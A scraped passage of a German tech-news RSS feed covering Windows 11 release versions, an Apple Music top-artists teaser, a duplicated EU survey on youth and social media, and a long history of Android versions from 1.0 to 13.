<p>Ende Oktober 2023 veröffentlichte Microsoft schließlich die Version <strong>23H2</strong>. Diese zeichnet sich in erster Linie durch die Integration generativer KI-Funktionen auf GPT-4-Basis aus – Stichwort <a title="Copilot" href="https://www.computerwoche.de/article/2829460/microsoft-das-muss-besser-werden.html" target="_blank">Copilot</a>. Das wirkt sich vielfältig auf diverse Bereiche des <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a>-Ökosystems aus, wie eine Microsoft-Expertin <a href="https://www.youtube.com/watch?v=x4IzxwYinow" target="_blank" rel="noreferrer noopener">in diesem Videobeitrag ausführlich erklärt</a>.</p>



<h2 class="wp-block-heading">Windows 11 24H2</h2>



<p>Seit Oktober 2024 ist das 2024er-Update von Windows 11 allgemein verfügbar. Mit 24H2 halten zahlreiche Neuerungen in Windows 11 Einzug – insbesondere neue KI-Features (bei Copilot+-PCs). Darüber hinaus verspricht <strong>24H2</strong> auch WiFi-7-Support, einen optimierten Datei-Explorer sowie verbesserte Konnektivität. In der Praxis hat sich dieses Windows-Update leider vor allem dadurch ausgezeichnet, dass es bei der Nutzerbasis für umfassende (teilweise nur manuell zu lösende) <a href="https://learn.microsoft.com/de-de/windows/release-health/status-windows-11-24h2" target="_blank" rel="noreferrer noopener">Probleme gesorgt hat</a>.</p>



<p>Knapp vier Jahre nach seiner Veröffentlichung ist der Erfolg von <a title="Windows 11" href="https://www.computerwoche.de/article/2827473/windows-11-schneller-machen.html" target="_blank">Windows 11</a> mit Blick auf die Nutzerakzeptanz noch ausbaufähig. Immerhin hat Win 11 seinen Vorgänger inzwischen nach Marktanteil überholt. Aktuell (Stand: <a title="März 2024" href="https://gs.statcounter.com/os-version-market-share/windows/desktop/worldwide" target="_blank" rel="noopener">Februar 2026</a>) steht Windows 11 bei 62 Prozent. Der Vorgänger <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a> 10 bringt es noch auf 36 Prozent. </p>



<h2 class="wp-block-heading">Windows 11 25H2</h2>



<p>Seit dem 30. September 2025 steht Windows 11 25H2 zur Verfügung und zeichnet sich durch diverse neue, teilweise Hardware-exklusive Features aus. Letztere beinhalten vor allem neue KI-Funktionen für <a href="https://www.computerwoche.de/article/4100229/hype-um-microsofts-copilot-pc-muss-ein-ende-haben.html" target="_blank">Copilot+-PCs</a>. Darüber hinaus bietet 25H2 auch Support für WLAN-7-Zugriffspunkte, Windows-Sicherung für Organisationen sowie zahlreiche Optimierungen für Datei-Explorer und Task Manager. Die vollständige Auflistung finden Sie <a href="https://learn.microsoft.com/de-de/windows/whats-new/whats-new-windows-11-version-25h2" target="_blank" rel="noreferrer noopener">direkt bei Microsoft</a>. </p>



<h2 class="wp-block-heading">Windows 11 26H1</h2>



<p>Bei Win 11 26H1 handelt es sich um eine Version, die am 10. Februar 2026 veröffentlicht wurde und speziell auf neue, ARM-basierte Windows Devices abgestimmt ist, die <a href="https://learn.microsoft.com/de-de/windows/whats-new/windows-11-version-26h1" target="_blank" rel="noreferrer noopener">laut den Redmondern</a> Anfang 2026 auf den Markt kommen. (dpa/tc/mje/fm/ba)</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 20 most streamed artists on Apple Music revealed]]></title>
<description><![CDATA[It should come as no surprise that Taylor Swift, Bad Bunny, Ariana Grande, and Kendrick Lamar are among the top 20 most streamed artists of all time on Apple Music. Check out the full list.Apple Music has shared its top 20 artists of all timeApple Music launched on June 30, 2015, and it celebrate...]]></description>
<link>https://tsecurity.de/de/3609175/ios-mac-os/top-20-most-streamed-artists-on-apple-music-revealed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609175/ios-mac-os/top-20-most-streamed-artists-on-apple-music-revealed/</guid>
<pubDate>Fri, 19 Jun 2026 02:39:22 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It should come as no surprise that Taylor Swift, Bad Bunny, Ariana Grande, and Kendrick Lamar are among the top 20 most streamed artists of all time on <a href="https://appleinsider.com/inside/apple-music" title="Apple Music" data-kpt="1">Apple Music</a>. Check out the full list.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67992-143337-Apple-Music-playlists-xl.jpg" alt="Hand holding a smartphone displaying a colorful music app screen with personalized sections titled Your Essentials and Stations for You, against a blurred indoor background with a dark water bottle" height="738"><br><span>Apple Music has shared its top 20 artists of all time</span></div><br>Apple Music <a href="https://appleinsider.com/articles/25/06/30/apple-musics-ten-years-billions-of-dollars-in-fines-and-one-failure">launched on</a> June 30, 2015, and it <a href="https://appleinsider.com/articles/25/06/30/apple-musics-birthday-specials-include-a-500-most-streamed-songs-countdown">celebrated 10 years</a> of streaming with a top 500 songs list. A year on, the streamer has shared a new metric.<br><br>The new chart is the top 20 artists of all time on Apple Music, shared by Chart Data <a href="https://x.com/chartdata/status/2067708890116968833">on social media</a>. It's an official endorsement, as Apple Music's account reposted it and replied with a heart and trophy emoji.<br><br><br> <a href="https://appleinsider.com/articles/26/06/19/top-20-most-streamed-artists-on-apple-music-revealed?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244700?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[EU-Umfrage zu Social Media: Arglose Jugend, übervorsichtige Eltern?]]></title>
<description><![CDATA[Jugendliche scheinen Social Media weniger kritisch als ihre Eltern zu sehen. In Detailfragen berichten sie aber von mehr Negativem und wollen auch mehr Hilfe.]]></description>
<link>https://tsecurity.de/de/3607786/it-nachrichten/eu-umfrage-zu-social-media-arglose-jugend-uebervorsichtige-eltern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607786/it-nachrichten/eu-umfrage-zu-social-media-arglose-jugend-uebervorsichtige-eltern/</guid>
<pubDate>Thu, 18 Jun 2026 14:48:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jugendliche scheinen Social Media weniger kritisch als ihre Eltern zu sehen. In Detailfragen berichten sie aber von mehr Negativem und wollen auch mehr Hilfe.]]></content:encoded>
</item>
<item>
<title><![CDATA[EU-Umfrage zu Social Media: Arglose Jugend, übervorsichtige Eltern?]]></title>
<description><![CDATA[Jugendliche scheinen Social Media weniger kritisch als ihre Eltern zu sehen. In Detailfragen berichten sie aber von mehr Negativem und wollen auch mehr Hilfe.]]></description>
<link>https://tsecurity.de/de/3607785/it-nachrichten/eu-umfrage-zu-social-media-arglose-jugend-uebervorsichtige-eltern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607785/it-nachrichten/eu-umfrage-zu-social-media-arglose-jugend-uebervorsichtige-eltern/</guid>
<pubDate>Thu, 18 Jun 2026 14:48:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jugendliche scheinen Social Media weniger kritisch als ihre Eltern zu sehen. In Detailfragen berichten sie aber von mehr Negativem und wollen auch mehr Hilfe.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android versions: A living history from 1.0 to 17]]></title>
<description><![CDATA[What a long, strange trip it’s been.



From its inaugural release to today, Android has transformed visually, conceptually and functionally — time and time again. Google’s mobile operating system may have started out scrappy, but holy moly, has it ever evolved.



Here’s a fast-paced tour of And...]]></description>
<link>https://tsecurity.de/de/3607345/it-nachrichten/android-versions-a-living-history-from-10-to-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607345/it-nachrichten/android-versions-a-living-history-from-10-to-17/</guid>
<pubDate>Thu, 18 Jun 2026 12:19:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>What a long, strange trip it’s been.</p>



<p>From its inaugural release to today, Android has transformed visually, conceptually and functionally — time and time again. Google’s mobile operating system may have started out scrappy, but holy moly, has it ever evolved.</p>



<p>Here’s a fast-paced tour of Android version highlights from the platform’s birth to present. (Feel free to skip ahead if you just want to see what’s new in the most recent <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html#android17">Android 17</a> update.)</p>



<h2 class="wp-block-heading">Android versions 1.0 to 1.1: The early days</h2>



<p>Android made its official public debut in 2008 with Android 1.0 — a release so ancient it didn’t even have a cute codename.</p>



<p>Things were pretty basic back then, but the software did include a suite of early Google apps like Gmail, Maps, Calendar, and YouTube, all of which were integrated into the operating system — a stark contrast to the <a href="https://www.computerworld.com/article/1664222/google-grand-plan-android.html">more easily updatable standalone-app model</a> employed today.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>The Android 1.0 home screen and its rudimentary web browser (not yet called Chrome).</p>
</figcaption></figure><p class="imageCredit">T-Mobile</p></div>



<h2 class="wp-block-heading">Android version 1.5: Cupcake</h2>



<p>With early 2009’s Android 1.5 Cupcake release, the tradition of Android version names was born. Cupcake introduced numerous refinements to the Android interface, including the first on-screen keyboard — something that’d be necessary as phones moved away from the once-ubiquitous physical keyboard model.</p>



<p>Cupcake also brought about the framework for third-party app widgets, which would quickly turn into one of Android’s most distinguishing elements, and it provided the platform’s first-ever option for video recording.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Cupcake was all about the widgets.</p>
</figcaption></figure><a href="https://en.wikipedia.org/wiki/Android_Cupcake#/media/File:Android_Cupcake_home_screen.jpg" target="_blank" class="imageCredit" rel="noopener">Android Police</a></div>



<h2 class="wp-block-heading">Android version 1.6: Donut</h2>



<p>Android 1.6, Donut, rolled into the world in the fall of 2009. Donut filled in some important holes in Android’s center, including the ability for the OS to operate on a variety of different screen sizes and resolutions — a factor that’d be critical in the years to come. It also added support for CDMA networks like Verizon, which would play a key role in Android’s imminent explosion.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Android’s universal search box made its first appearance in Android 1.6.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<h2 class="wp-block-heading">Android versions 2.0 to 2.1: Eclair</h2>



<p>Keeping up the breakneck release pace of Android’s early years, Android 2.0, Eclair, emerged just six weeks after Donut; its “point-one” update, also called Eclair, came out a couple months later. Eclair was the first Android release to enter mainstream consciousness thanks to <a href="https://www.pcworld.com/article/182310/Droid_Sales_and_the_Android_Explosion.html" target="_blank">the original Motorola Droid</a> phone and the massive Verizon-led marketing campaign surrounding it.</p>



<p>Verizon’s “iDon’t” ad for the Droid.</p>



<p>The release’s most transformative element was the addition of voice-guided turn-by-turn navigation and real-time traffic info — something previously unheard of (and still essentially unmatched) in the smartphone world. Navigation aside, Eclair brought live wallpapers to Android as well as the platform’s first speech-to-text function. And it made waves for injecting the once-iOS-exclusive pinch-to-zoom capability into Android — a move often seen as the spark that ignited Apple’s long-lasting <a href="https://www.computerworld.com/article/1515386/steve-jobs-called-for-holy-war-against-google.html">“thermonuclear war”</a> against Google.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>The first versions of turn-by-turn navigation and speech-to-text, in Eclair.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<h2 class="wp-block-heading">Android version 2.2: Froyo</h2>



<p>Just four months after Android 2.1 arrived, Google served up Android 2.2, Froyo, which revolved largely around under-the-hood performance improvements.</p>



<p>Froyo did deliver some important front-facing features, though, including the addition of the now-standard dock at the bottom of the home screen as well as the first incarnation of Voice Actions, which allowed you to perform basic functions like getting directions and making notes by tapping an icon and then speaking a command.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Google’s first real attempt at voice control, in Froyo.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>Notably, Froyo also brought support for Flash to <a href="https://www.computerworld.com/article/1631552/android-browser-multitasking.html">Android’s web browser</a> — an option that was significant both because of the widespread use of Flash at the time and because of <a href="https://www.computerworld.com/article/1344188/mobile-apps-why-the-apple-crowd-s-completely-wrong-about-flash.html">Apple’s adamant stance against supporting it</a> on its own mobile devices. Apple would eventually win, of course, and Flash would become far less common. But back when it was still everywhere, being able to access the full web without any black holes <a href="https://www.computerworld.com/article/1484597/mobile-apps-flash-boom-bang-android-and-the-adobe-flash-clash.html">was a genuine advantage</a> only Android could offer.</p>



<h2 class="wp-block-heading">Android version 2.3: Gingerbread</h2>



<p>Android’s first true visual identity started coming into focus with <a href="https://www.computerworld.com/article/1349219/android-gingerbread-the-complete-faq.html">2010’s Gingerbread release</a>. Bright green had long been the color of Android’s robot mascot, and with Gingerbread, it became an integral part of the operating system’s appearance. Black and green seeped all over the UI as Android started its slow march toward distinctive design.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>It was easy being green back in the Gingerbread days.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android 3.0 to 3.2: Honeycomb</h2>



<p>2011’s <a href="https://www.computerworld.com/article/1536087/android-honeycomb-powerful-and-promising-but-not-perfect.html">Honeycomb</a> period was a weird time for Android. Android 3.0 came into the world as a tablet-only release to accompany the launch of the Motorola Xoom, and through the subsequent 3.1 and 3.2 updates, it remained a tablet-exclusive (and closed-source) entity.</p>



<p>Under the guidance of newly arrived design chief <a href="https://en.wikipedia.org/wiki/Mat%C3%ADas_Duarte" target="_blank" rel="noopener nofollow">Matias Duarte</a>, Honeycomb introduced a dramatically reimagined UI for Android. It had a space-like “holographic” design that traded the platform’s trademark green for blue and placed an emphasis on making the most of a tablet’s screen space.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Honeycomb: When Android got a case of the holographic blues.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>While the concept of a tablet-specific interface didn’t last long, many of Honeycomb’s ideas laid the groundwork for the Android we know today. The software was the first to use on-screen buttons for Android’s main navigational commands; it marked <a href="https://www.computerworld.com/article/1491147/hallelujah-samsung-is-finally-ditching-the-old-android-menu-button.html">the beginning of the end</a> for the permanent overflow-menu button; and it introduced the concept of a card-like UI with its take on the Recent Apps list.</p>



<h2 class="wp-block-heading">Android version 4.0: Ice Cream Sandwich</h2>



<p>With Honeycomb acting as the bridge from old to new, <a href="https://www.computerworld.com/article/1499183/mobile-apps-android-ice-cream-sandwich-the-complete-faq.html">Ice Cream Sandwich</a> — also released in 2011 — served as the platform’s official entry into the era of modern design. The release refined the visual concepts introduced with Honeycomb and reunited tablets and phones with <a href="https://www.computerworld.com/article/1486292/ice-cream-sandwich-on-android-tablets-a-visual-tour.html">a single, unified UI vision</a>.</p>



<p>ICS dropped much of Honeycomb’s “holographic” appearance but kept its use of blue as a system-wide highlight. And it carried over core system elements like on-screen buttons and a card-like appearance for app-switching.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>The ICS home screen and app-switching interface.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Android 4.0 also made swiping a more integral method of getting around the operating system, with the then-revolutionary-feeling ability to swipe away things like notifications and recent apps. And it started the slow process of bringing a standardized design framework — <a href="https://android-developers.googleblog.com/2012/01/holo-everywhere.html" rel="noopener nofollow" target="_blank">known as “Holo”</a> — all throughout the OS and into Android’s app ecosystem.</p>



<h2 class="wp-block-heading">Android versions 4.1 to 4.3: Jelly Bean</h2>



<p>Spread across three impactful Android versions, 2012 and 2013’s <a href="https://www.computerworld.com/article/1486663/android-4-1-jelly-bean-the-complete-faq.html">Jelly Bean</a> releases took ICS’s fresh foundation and made meaningful strides in fine-tuning and building upon it. The releases added <a href="https://www.computerworld.com/article/1488285/android-4-2-the-poise-and-the-polish.html">plenty of poise and polish</a> into the operating system and went a long way in making Android more inviting for the average user.</p>



<p>Visuals aside, Jelly Bean brought about our first taste of <a href="https://www.computerworld.com/article/1487695/google-now-revisited-one-month-with-android-s-new-secret-weapon.html">Google Now</a> — the spectacular predictive-intelligence utility that’s sadly since <a href="https://www.computerworld.com/article/1713354/google-feed.html">devolved into a glorified news feed</a>. It gave us expandable and interactive notifications, an expanded voice search system, and a more advanced system for displaying search results in general, with a focus on card-based results that attempted to answer questions directly.</p>



<p>Multiuser support also came into play, albeit on tablets only at this point, and an early version of Android’s Quick Settings panel made its first appearance. Jelly Bean ushered in a heavily hyped system for <a href="https://www.computerworld.com/article/1487969/android-4-2-lock-screen-widgets-hands-on-impressions-and-gallery.html">placing widgets on your lock screen</a>, too — one that, like <a href="https://www.computerworld.com/article/1675915/google-android-chrome-os-flip-flops.html">so many Android features over the years</a>, quietly disappeared a couple years later.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Jelly Bean’s Quick Settings panel and short-lived lock screen widget feature.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android version 4.4: KitKat</h2>



<p>Late-2013’s <a href="https://www.computerworld.com/article/1488220/android-4-4-kitkat-the-complete-faq.html">KitKat</a> release marked the end of Android’s dark era, as the blacks of Gingerbread and the blues of Honeycomb finally made their way out of the operating system. Lighter backgrounds and more neutral highlights took their places, with a transparent status bar and white icons giving the OS a more contemporary appearance.</p>



<p>Android 4.4 also saw the first version of “OK, Google” support — but in KitKat, the hands-free activation prompt worked only when your screen was already on <em>and</em> you were either at your home screen or inside the Google app.</p>



<p>The release was Google’s first foray into claiming a full panel of the home screen for its services, too — at least, for users of its own Nexus phones and those who chose to download its first-ever standalone launcher.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>The lightened KitKat home screen and its dedicated Google Now panel.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android versions 5.0 and 5.1: Lollipop</h2>



<p>Google essentially reinvented Android — again — with its <a href="https://www.computerworld.com/article/1605043/android-50-lollipop-faq.html">Android 5.0 Lollipop release</a> in the fall of 2014. Lollipop launched the still-present-today <a href="https://www.computerworld.com/article/1618144/material-design-1-year-later-pocket-pocketcasts.html">Material Design standard</a>, which brought a whole new look that extended across all of Android, its apps and even other Google products.</p>



<p>The card-based concept that had been scattered throughout Android became a core UI pattern — one that would guide the appearance of everything from notifications, which now showed up on the lock screen for at-a-glance access, to the Recent Apps list, which took on an unabashedly card-based appearance.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Lollipop and the onset of Material Design.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Lollipop introduced a slew of new features into Android, including truly hands-free voice control via the “OK, Google” command, support for multiple users on phones and a priority mode for better notification management. It changed so much, unfortunately, that it also introduced <a href="https://www.computerworld.com/article/1617255/broken-lollipop-android-50.html">a bunch of troubling bugs</a>, many of which wouldn’t be fully ironed out until the following year’s 5.1 release.</p>



<h2 class="wp-block-heading">Android version 6.0: Marshmallow</h2>



<p>In the grand scheme of things, 2015’s <a href="https://www.computerworld.com/article/1648529/android-60-marshmallow-faq.html">Marshmallow</a> was a fairly minor Android release — one that seemed <a href="https://www.computerworld.com/article/1640270/android-60-marshmallow.html">more like a 0.1-level update</a> than anything deserving of a full number bump. But it started the trend of Google releasing one major Android version per year and that version always receiving its own whole number.</p>



<p>Marshmallow’s most attention-grabbing element was a screen-search feature called Now On Tap — something that, <a href="https://www.computerworld.com/article/1647791/android-60-google-now-on-tap.html">as I said at the time</a>, had tons of potential that wasn’t fully tapped. Google never quite perfected the system and ended up quietly retiring its brand and moving it out of the forefront the following year.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Marshmallow and the almost-brilliance of Google Now on Tap.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Android 6.0 did introduce some stuff with lasting impact, though, including more granular app permissions, support for fingerprint readers, and support for USB-C.</p>



<h2 class="wp-block-heading">Android versions 7.0 and 7.1: Nougat</h2>



<p>Google’s 2016 <a href="https://www.computerworld.com/article/1676923/android-70-nougat-faq.html">Android Nougat</a> releases provided Android with a native split-screen mode, a new bundled-by-app system for organizing notifications, and a Data Saver feature. Nougat added some <a href="https://www.computerworld.com/article/1659731/android-n-features.html">smaller but still significant features</a>, too, like <a href="https://www.computerworld.com/article/1713251/time-saving-android-shortcuts.html">an Alt-Tab-like shortcut</a> for snapping between apps.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Android 7.0 Nougat and its new native split-screen mode.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Perhaps most pivotal among Nougat’s enhancements, however, was the launch of the <a href="https://www.computerworld.com/article/1672409/google-assistant-clarity-consistency.html">Google Assistant</a> — which came alongside the announcement of <a href="https://www.computerworld.com/article/1667955/google-pixel-phone.html">Google’s first fully self-made phone</a>, the Pixel, about two months after Nougat’s debut. The Assistant would go on to become a critical component of Android and most other Google products and is arguably the company’s <a href="https://www.computerworld.com/article/1713866/google-ecosystem.html">foremost effort today</a>.</p>



<h2 class="wp-block-heading">Android version 8.0 and 8.1: Oreo</h2>



<p><span lang="EN"><a href="https://www.computerworld.com/article/1712082/android-80-oreo.html">Android Oreo</a> added a variety of niceties to the platform, including a native picture-in-picture mode, a <a href="https://www.computerworld.com/article/1668192/android-o-notifications.html">notification snoozing</a> option, and notification channels that offer fine control over how apps can alert you.</span></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Oreo adds several significant features to the operating system, including a new picture-in-picture mode.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>The 2017 release also included some noteworthy elements that furthered <a href="https://www.computerworld.com/article/1711690/android-chrome-os-alignment.html">Google’s goal of aligning Android and Chrome OS</a> and improving the experience of using <a href="https://www.computerworld.com/article/1713962/android-apps-for-chromebooks-the-essentials.html">Android apps on Chromebooks</a>, and it was the first Android version to feature <a href="https://www.computerworld.com/article/1680570/google-android-upgrades-project-treble.html">Project Treble</a> — an ambitious effort to create a modular base for Android’s code with the hope of making it easier for device-makers to provide timely software updates.</p>



<h2 class="wp-block-heading">Android version 9: Pie</h2>



<p>The freshly baked scent of <a href="https://www.computerworld.com/article/1716905/android-pie-30-advanced-tips-and-tricks.html">Android Pie</a>, a.k.a. Android 9, wafted into the Android ecosystem in August of 2018. Pie’s most transformative change was its <a href="https://www.computerworld.com/article/1689846/android-p-gesture-navigation.html">hybrid gesture/button navigation system</a>, which traded Android’s traditional Back, Home, and Overview keys for a large, multifunctional Home button and a small Back button that appeared alongside it as needed.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2018/08/android-versions-pie-100766995-orig.jpg?quality=50&amp;strip=all" alt="android versions pie" class="wp-image-71344" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 9 introduced a new gesture-driven system for getting around phones, with an elongated Home button and a small Back button that appears as needed.</p></figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Pie included some <a href="https://www.computerworld.com/article/1690077/android-p-features.html">noteworthy productivity features</a>, too, such as a universal suggested-reply system for messaging notifications, a new dashboard of <a href="https://www.computerworld.com/article/1698598/android-9-pie.html">Digital Wellbeing controls</a>, and more intelligent systems for power and screen brightness management. And, of course, there was no shortage of <a href="https://www.computerworld.com/article/1697656/android-p-additions.html">smaller but still-significant advancements</a> hidden throughout Pie’s filling, including a smarter way to handle Wi-Fi hotspots, a welcome twist to Android’s Battery Saver mode, and a variety of <a href="https://www.computerworld.com/article/1717445/android-p-security.html">privacy and security enhancements</a>.</p>



<h2 class="wp-block-heading">Android version 10</h2>



<p>Google released Android 10 — the first Android version to <a href="https://www.computerworld.com/article/1657690/android-10-end-of-whimsy.html" title="https://www.computerworld.com/article/1657690/android-10-end-of-whimsy.html">shed its letter</a> and be known simply by a number, with no dessert-themed moniker attached — in September of 2019. Most noticeably, the software brought about a <a href="https://www.computerworld.com/article/1670334/android-q-gestures-problems.html" title="https://www.computerworld.com/article/1670334/android-q-gestures-problems.html">totally reimagined interface</a> for Android gestures, this time doing away with the tappable Back button altogether and relying on a completely swipe-driven approach to system navigation.</p>



<p>Android 10 packed plenty of other <a title="https://www.computerworld.com/article/1720172/android-q.html" href="https://www.computerworld.com/article/1720172/android-q.html">quietly important improvements</a>, including an <a title="https://www.computerworld.com/article/1658269/android-10-privacy.html" href="https://www.computerworld.com/article/1658269/android-10-privacy.html">updated permissions system</a> with more granular control over location data along with a new system-wide dark theme, a new distraction-limiting Focus Mode, and a new on-demand live captioning system for any actively playing media.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2019/09/android-versions-10-privacy-100810521-orig.jpg?quality=50&amp;strip=all" alt="android versions 10 privacy" class="wp-image-99668" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 10’s new privacy permissions model adds some much-needed nuance into the realm of location data.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android version 11</h2>



<p><a href="https://www.computerworld.com/article/1645546/18-advanced-tips-for-android-11.html">Android 11</a>, launched at the start of September 2020, was a pretty substantial Android update both under the hood and on the surface. The version’s most significant changes <a href="https://www.computerworld.com/article/1629241/android-11-additions.html">revolve around privacy</a>: The update built upon the expanded permissions system introduced in Android 10 and added in the option to grant apps location, camera, and microphone permissions only on a limited, single-use basis.</p>



<p>Android 11 also made it more difficult for apps to request the ability to detect your location in the background, and it introduced a feature that automatically revokes permissions from any apps you haven’t opened lately. On the interface level, Android 11 included a refined approach to conversation-related notifications along with a new streamlined media player, a new Notification History section, a native screen-recording feature, and a system-level menu of connected-device controls.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2020/09/android-versions-android-11-media-player-connected-controls-100857067-orig.jpg?quality=50&amp;strip=all" alt="android versions android 11 media player connected controls" class="wp-image-136995" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 11’s new media player appears as part of the system Quick Settings panel, while the new connected-device control screen comes up whenever you press and hold your phone’s physical power button.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android version 12</h2>



<p>Google officially launched the final version of Android 12 in October 2021, alongside the launch of its <a href="https://www.computerworld.com/article/1615815/pixel-6-vs-pixel-6-pro.html">Pixel 6 and Pixel 6 Pro phones</a>.</p>



<p>In a twist from the previous several Android versions, the most significant progressions with Android 12 were mostly on the surface. Android 12 featured the biggest reimagining of Android’s interface since 2014’s Android 5.0 (Lollipop) version, with an updated design standard known as Material You — which revolves around the idea of <em>you</em> customizing the appearance of your device with dynamically generated themes based on your current wallpaper colors. Those themes automatically change anytime your wallpaper changes, and they extend throughout the entire operating system interface and even into the interfaces of apps that support the standard.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2021/05/android-versions-android-12-material-you-100889678-orig.jpg?quality=50&amp;strip=all" alt="android versions android 12 material you" class="wp-image-163730" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 12 ushered in a whole new look and feel for the operating system, with an emphasis on simple color customization.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>Surface-level elements aside, Android 12 brought a (<a href="https://www.computerworld.com/article/1639159/android-missed-opportunity.html">long overdue</a>) renewed focus to Android’s widget system along with a host of important foundational enhancements in the areas of performance, security, and privacy. The update provided more powerful and accessible controls over how different apps are using your data and how much information you allow apps to access, for instance, and it included a new isolated section of the operating system that allows AI features to operate entirely on a device, without any potential for network access or data exposure.</p>



<h2 class="wp-block-heading">Android version 13</h2>



<p>Android 13, launched in August 2022, was simultaneously one of the most ambitious updates in Android history <em>and </em>one of the most subtle version changes to date.</p>



<p>On tablets and foldable phones, Android 13 introduced a slew of significant interface updates and additions aimed at improving the large-screen Android experience — including an enhanced split-screen mode for multitasking and a <a href="https://www.computerworld.com/article/1619037/android-chrome-os-intersection.html">ChromeOS-like taskbar</a> for easy app access from anywhere.</p>


